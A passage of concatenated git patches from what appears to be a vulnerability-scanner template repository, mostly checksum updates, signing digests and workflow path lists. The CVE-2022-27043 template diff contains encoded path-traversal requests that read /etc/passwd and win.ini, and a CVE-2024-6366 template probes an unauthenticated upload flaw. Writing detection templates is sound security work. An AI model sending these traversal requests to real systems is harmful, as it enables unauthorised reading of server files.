+http/technologies/wordpress/plugins/wp-crontrol.yaml:7a623bf74f173d0c6a1d323d0bcf7d40236a652a +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d3694b4612fe7a671a02efc77147d907d1d19f8c +http/technologies/wordpress/plugins/wp-file-manager.yaml:923e607afbf441cb7cbbfd12d4c60df32e36163e +http/technologies/wordpress/plugins/wp-google-maps.yaml:87389b08bf5ee02c77f84b80584d58b407cfed9b +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:45d567c972cf96d2d9e4f78c3975144fb0e8de2a +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:49f95af0bbcccbc5bd6d471f216b730f7515bf4d +http/technologies/wordpress/plugins/wp-migrate-db.yaml:b0083249a97670f91811f92397ac7c1a0c10f1b3 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:3a2f8d83d16946046ac2fd0599fdcb7189087f69 +http/technologies/wordpress/plugins/wp-optimize.yaml:98e16005a7b7c4b86ca183a9f64aeba68aff19f6 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:812a0cb9687bcdad573e64c9f2a88649fe60d361 +http/technologies/wordpress/plugins/wp-reset.yaml:c18f4a125e9bdf0c78a9ae1d9799d4b66f129c40 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:074d82a2ff8fe19a78dd41854288590699b0ac84 +http/technologies/wordpress/plugins/wp-rollback.yaml:871a52b2eadff49c8ad59861f7bf7e00c92ffa64 +http/technologies/wordpress/plugins/wp-seopress.yaml:17132c727d82625cfe0a7de9428b6b8cfbf6495c +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a6572bb74c0cc5ff972cf6993f9b065b4026a243 +http/technologies/wordpress/plugins/wp-smushit.yaml:28dddce7646a0257d55bd4249322162617b2a941 +http/technologies/wordpress/plugins/wp-statistics.yaml:1e8a5f577d6228b2c0d919fc48eb24710e1f967d +http/technologies/wordpress/plugins/wp-super-cache.yaml:23361ff2818bc2bb57d876e8b0e036d56d3bd67b http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:1d7df0209c7416f17a4c2fb18512740c5fa79aed +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:75282bef1d2b9947f13b705305073d354b9d5ed9 +http/technologies/wordpress/plugins/wpforms-lite.yaml:40219485097daf6125086695e25207efc7cd5fc6 +http/technologies/wordpress/plugins/wps-hide-login.yaml:8a8645f2e14ccfcc376acaabb45e52423f91408b +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:30deebcc14271fd4755d8b12c65d05943c7681c9 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c25c45221b2255963c8985ea182d32bb03feea1c http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8938,7 +8940,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b79a363e6d3241bd08dffcd9c8a0dbc2ea25a2eb +templates-checksum.txt:dd74f00b0c51eec7d0dcb23b13aac4d3752adf23 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 5699ec43d2c9c0d526942ec1544a9218cc468b27 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:27:38 +0000 Subject: [PATCH 1747/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a280c9f599..27a79e75c5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' - 'http/cves/2024/CVE-2024-6922.yaml' + - 'http/cves/2024/CVE-2024-7188.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' - 'http/misconfiguration/installer/quickcms-installer.yaml' - 'http/osint/user-enumeration/substack.yaml' From 01761c88528deed7309ade12a0ae8614cc39da22 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:28:32 +0000 Subject: [PATCH 1748/1841] Auto Template Signing [Tue Jul 30 07:28:32 UTC 2024] :robot: --- http/cves/2024/CVE-2024-7188.yaml | 1 + http/misconfiguration/installer/quickcms-installer.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-7188.yaml b/http/cves/2024/CVE-2024-7188.yaml index 342f574e46..5a2ff4756f 100644 --- a/http/cves/2024/CVE-2024-7188.yaml +++ b/http/cves/2024/CVE-2024-7188.yaml @@ -42,3 +42,4 @@ http: - 'contains(content_type,"text/html")' - 'contains_all(body,"og:site_name","og:locale","range2")' condition: and +# digest: 4b0a00483046022100d1f6f27cc7814299b6441d75c822b8051633e5ceb44e953bed20ce943ab1b55a0221009abee0c9f427214334aa2b3d6852ef7a534f500c932b64a5c9a4af7658870cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/quickcms-installer.yaml b/http/misconfiguration/installer/quickcms-installer.yaml index 995f6539d8..8c060fdbd7 100644 --- a/http/misconfiguration/installer/quickcms-installer.yaml +++ b/http/misconfiguration/installer/quickcms-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502201610625ad0ddb777b6a8cf826aa031d494d756d7a2c42785b88ad724c58408e602210086feb42208352958dabe9d9b81aaa892056e1a15a0de1c4bc56c0a31b04de3c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1cfd71828ce3e6a2ebe5178664241474f0756c10 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jul 2024 12:58:50 +0530 Subject: [PATCH 1749/1841] Fix FN matcher-request --- http/cves/2024/CVE-2024-6366.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-6366.yaml b/http/cves/2024/CVE-2024-6366.yaml index b805501b51..e6a10f7dd1 100644 --- a/http/cves/2024/CVE-2024-6366.yaml +++ b/http/cves/2024/CVE-2024-6366.yaml @@ -1,16 +1,17 @@ id: CVE-2024-6366 info: - name: User Profile Builder < 3.11.8 - Unauthenticated Media Upload + name: User Profile Builder < 3.11.8 - File Upload author: securityforeveryone severity: high description: | The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-6366 - https://wpscan.com/vulnerability/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e/ - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6366 + - https://nvd.nist.gov/vuln/detail/CVE-2024-6366 classification: + cve-id: CVE-2024-6366 epss-score: 0.00043 epss-percentile: 0.09351 metadata: @@ -28,15 +29,13 @@ variables: http: - raw: - | - GET /wp-content/plugins/profile-builder/readme.txt HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'contains(body,"User Profile Builder")' - - 'status_code == 200' - condition: and + - 'contains(body,"/plugins/profile-builder")' internal: true - raw: From 1c36698e11919e7821811d9135b62acef462f2d7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:30:15 +0000 Subject: [PATCH 1751/1841] Auto Generated Templates Checksum [Tue Jul 30 07:30:15 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d33f6b1e31..362c31e0b8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3516,11 +3516,11 @@ http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 -http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f +http/cves/2024/CVE-2024-4879.yaml:06674940182d35e65b4d009a6fab89d8901fe44b http/cves/2024/CVE-2024-4885.yaml:07c029860a99bdbcbad5392449bc97517616d93c http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 -http/cves/2024/CVE-2024-5217.yaml:cf2d874cba1069c15371fe16a5ede176ba0bfae7 +http/cves/2024/CVE-2024-5217.yaml:4c2ca1ca96361f71bfd79b160a2ae5eede0b46ac http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5315.yaml:55694720bf4a9d27af050fb130c802dc0d32f924 http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a @@ -3533,7 +3533,7 @@ http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 http/cves/2024/CVE-2024-6922.yaml:83b019597ae43258e9b9b0786304ed398ce3fe14 -http/cves/2024/CVE-2024-7188.yaml:10961e62f02c5ac7efc284a6b8fbef2ca7089a55 +http/cves/2024/CVE-2024-7188.yaml:5edd2259c08b9141388e13eb5fba2281baa93044 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -5781,7 +5781,7 @@ http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1af http/misconfiguration/installer/profittrailer-installer.yaml:7400afd0fc1552d5fc6e5dc1808e05294d9fe119 http/misconfiguration/installer/projectsend-installer.yaml:aa78d14c8384bd5355f0d504c5d73032eef9cc80 http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 -http/misconfiguration/installer/quickcms-installer.yaml:a20b34b38abd6bf3e91475b93cf06d4599b6cac2 +http/misconfiguration/installer/quickcms-installer.yaml:53cb2e9e0473e00c44597d851edcc42a274735db http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d @@ -8940,7 +8940,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dd74f00b0c51eec7d0dcb23b13aac4d3752adf23 +templates-checksum.txt:ccb4a3b24cb4efb0e66333cfd7ba91faecdec74c vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 132c8427ad3796f71a82d86c352136052b2b29b6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jul 2024 13:01:43 +0530 Subject: [PATCH 1752/1841] Rename CVE-2022-27043 to CVE-2022-27043.yaml --- http/cves/2022/{CVE-2022-27043 => CVE-2022-27043.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cves/2022/{CVE-2022-27043 => CVE-2022-27043.yaml} (100%) diff --git a/http/cves/2022/CVE-2022-27043 b/http/cves/2022/CVE-2022-27043.yaml similarity index 100% rename from http/cves/2022/CVE-2022-27043 rename to http/cves/2022/CVE-2022-27043.yaml From 05b39c88968712f7562aee88583ae71475402086 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:31:53 +0000 Subject: [PATCH 1753/1841] Auto Template Signing [Tue Jul 30 07:31:53 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4879.yaml | 2 +- http/cves/2024/CVE-2024-5217.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index 4957c2a65b..e7b104bc52 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205fffb19b088bd6aacae4eff5e3e51db761eda582f4957a4863f4865611e45f570221009cff96f5dc1de26ba5a1c59fb1b01f53e7232c87aaba8322b8439f45d687b9f0:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022063984d3cbce5745d043c5c9cc387f8053cac782d8047425802957d46af6c4a3502205a4c9c52d6c30c5648035192252a7f7e9bb93fb649b1049b1340060765d10da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-5217.yaml b/http/cves/2024/CVE-2024-5217.yaml index fb00a89d02..8c02a31892 100644 --- a/http/cves/2024/CVE-2024-5217.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd7021d66da3ea62115899f8a80baafb14308996dd48db662b8f97f06ec9a478022100b2401925d9ebe433c7487e337c23f056a15aa00a9e243fed3206122d7736976e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e9515b4d468ac0501a40f645a76cff084bacf0ee929360cd16286bf146247503022060a8edc9206f1547392f6b47b16ae55c45598df04944010c30eb5cc0107a83ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 120016a4b091b300c9ae0fe19b08a25f6e9aa7f7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jul 2024 13:02:29 +0530 Subject: [PATCH 1754/1841] Update CVE-2022-27043.yaml --- http/cves/2022/CVE-2022-27043.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2022/CVE-2022-27043.yaml b/http/cves/2022/CVE-2022-27043.yaml index 5a4054d67d..eac96d2c9f 100644 --- a/http/cves/2022/CVE-2022-27043.yaml +++ b/http/cves/2022/CVE-2022-27043.yaml @@ -9,6 +9,7 @@ info: reference: - https://github.com/jimdx/YEARNING-CVE-2022-27043/blob/main/README.md - http://yearning.io/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-27043 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -31,6 +32,7 @@ http: - "{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd" - "{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini" + stop-at-first-match: true matchers: - type: dsl dsl: From 61ced69adb2968147996e398adc8bf229e7fbe6d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:33:40 +0000 Subject: [PATCH 1755/1841] Auto Generated New Template Addition List [Tue Jul 30 07:33:40 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3c7212c0fa..cd89ade09b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2023/CVE-2023-44393.yaml http/cves/2024/CVE-2024-6205.yaml +http/cves/2024/CVE-2024-6366.yaml http/cves/2024/CVE-2024-6922.yaml http/cves/2024/CVE-2024-7188.yaml http/misconfiguration/deployment-interface-exposed.yaml From d7e90f7a73e8a2dd890d1127360910371d60dd37 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:33:46 +0000 Subject: [PATCH 1756/1841] Auto Generated Templates Checksum [Tue Jul 30 07:33:46 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 362c31e0b8..f7b64bd568 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3516,11 +3516,11 @@ http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 -http/cves/2024/CVE-2024-4879.yaml:06674940182d35e65b4d009a6fab89d8901fe44b +http/cves/2024/CVE-2024-4879.yaml:28a9b04ce47c122ceadce4da40ec52394eb3a8ca http/cves/2024/CVE-2024-4885.yaml:07c029860a99bdbcbad5392449bc97517616d93c http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 -http/cves/2024/CVE-2024-5217.yaml:4c2ca1ca96361f71bfd79b160a2ae5eede0b46ac +http/cves/2024/CVE-2024-5217.yaml:4fadf394def4c4b705871b805aced6715c7a2a06 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5315.yaml:55694720bf4a9d27af050fb130c802dc0d32f924 http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a @@ -3529,6 +3529,7 @@ http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/cves/2024/CVE-2024-6205.yaml:b7365f0543b4c8a4207086dcf8c8eba65bca7a5d http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 +http/cves/2024/CVE-2024-6366.yaml:539e41b87ff1350c1f4727cfcfc3f4e9f1b48b15 http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 @@ -8940,7 +8941,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ccb4a3b24cb4efb0e66333cfd7ba91faecdec74c +templates-checksum.txt:b6f240ea4277fdf62fe28c3856ac769497c813d0 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From fc37bee12823b1876c32530245b60c7b29721111 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:34:28 +0000 Subject: [PATCH 1757/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 27a79e75c5..e79137ee26 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' + - 'http/cves/2024/CVE-2024-6366.yaml' - 'http/cves/2024/CVE-2024-6922.yaml' - 'http/cves/2024/CVE-2024-7188.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' From ae7a740dc72f5ec4f3e1151eb9bc209fc7642d88 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:35:30 +0000 Subject: [PATCH 1758/1841] Auto Template Signing [Tue Jul 30 07:35:30 UTC 2024] :robot: --- http/cves/2024/CVE-2024-6366.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-6366.yaml b/http/cves/2024/CVE-2024-6366.yaml index e6a10f7dd1..f8464b37c7 100644 --- a/http/cves/2024/CVE-2024-6366.yaml +++ b/http/cves/2024/CVE-2024-6366.yaml @@ -86,3 +86,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c097589d319c657b57ec2360a4918baeb01717391160a286990beb6798a607bf02204f0b692c85592fede96803d81734e118aea1c204b84e51a0e212e8d0c557c868:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f9719a4844e204e5bd0f7fef48c3a12a5231b0e8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:40:40 +0000 Subject: [PATCH 1759/1841] Auto Generated New Template Addition List [Tue Jul 30 07:40:40 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cd89ade09b..01c29c5c15 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-44393.yaml http/cves/2024/CVE-2024-6205.yaml http/cves/2024/CVE-2024-6366.yaml From 9a22a6d24105d18b6a93ca1a9634a2b13d693d2c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:40:47 +0000 Subject: [PATCH 1760/1841] Auto Generated Templates Checksum [Tue Jul 30 07:40:47 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f7b64bd568..8e83a45541 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2741,6 +2741,7 @@ http/cves/2022/CVE-2022-26352.yaml:bc7654fa61427983be547e7d4d15ecae87e3cee5 http/cves/2022/CVE-2022-26564.yaml:2d0c2c8598581465620d49e3fb6230e3201b652f http/cves/2022/CVE-2022-26833.yaml:901ee9c385a94dddb37c455cc0b90607a6c4ab1a http/cves/2022/CVE-2022-26960.yaml:a1ebb500d8d1f56c40ade43e4b7f7bbcba6421eb +http/cves/2022/CVE-2022-27043.yaml:5da1decb3be06ea89d88cea6d5528b942516a870 http/cves/2022/CVE-2022-2733.yaml:8ff5f3ca9ce67efd0ed1d1b3589dfdc30c8707c5 http/cves/2022/CVE-2022-2756.yaml:2444e6891c59f52dc478f9adf1b064d43ca8afb9 http/cves/2022/CVE-2022-27593.yaml:148edb32eaa88b10e1c6028cae4a2bca2a5c5a57 @@ -3529,7 +3530,7 @@ http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/cves/2024/CVE-2024-6205.yaml:b7365f0543b4c8a4207086dcf8c8eba65bca7a5d http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 -http/cves/2024/CVE-2024-6366.yaml:539e41b87ff1350c1f4727cfcfc3f4e9f1b48b15 +http/cves/2024/CVE-2024-6366.yaml:13d57831fba2fd50976e1e01e8048ff76767e4a9 http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 @@ -8941,7 +8942,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b6f240ea4277fdf62fe28c3856ac769497c813d0 +templates-checksum.txt:00becbaf1d12bcc68c09e89cd072bb5a9be0f737 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 057dc7f4c066746277057e7158246aafd7829cdd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:41:30 +0000 Subject: [PATCH 1761/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e79137ee26..8baa88016e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2022/CVE-2022-27043.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' - 'http/cves/2024/CVE-2024-6366.yaml' From 53919fcaad78bf60746f1d6455a6ae6540166bdf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:42:27 +0000 Subject: [PATCH 1762/1841] Auto Template Signing [Tue Jul 30 07:42:27 UTC 2024] :robot: --- http/cves/2022/CVE-2022-27043.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-27043.yaml b/http/cves/2022/CVE-2022-27043.yaml index eac96d2c9f..4fa92bca13 100644 --- a/http/cves/2022/CVE-2022-27043.yaml +++ b/http/cves/2022/CVE-2022-27043.yaml @@ -40,3 +40,4 @@ http: - "contains(content_type, 'text/plain')" - "status_code == 200" condition: and +# digest: 4a0a00473045022100885209bcdde4f416ff626d7b7dab74e8b68e3638a8e9db3a5252a1483c051b0802201c26eb9b3a190dcb0295e45f2a333c4b78724e394aa59548e81644fad3fb5823:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 64935a038efd7a4f95ea4814d43307f556fc39cb Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:43:03 +0000 Subject: [PATCH 1763/1841] Auto Generated New Template Addition List [Tue Jul 30 07:43:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 01c29c5c15..e623213054 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-44393.yaml +http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-6205.yaml http/cves/2024/CVE-2024-6366.yaml http/cves/2024/CVE-2024-6922.yaml From cc906e7a90d2a5e280500ceb1393155ab5ee4056 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 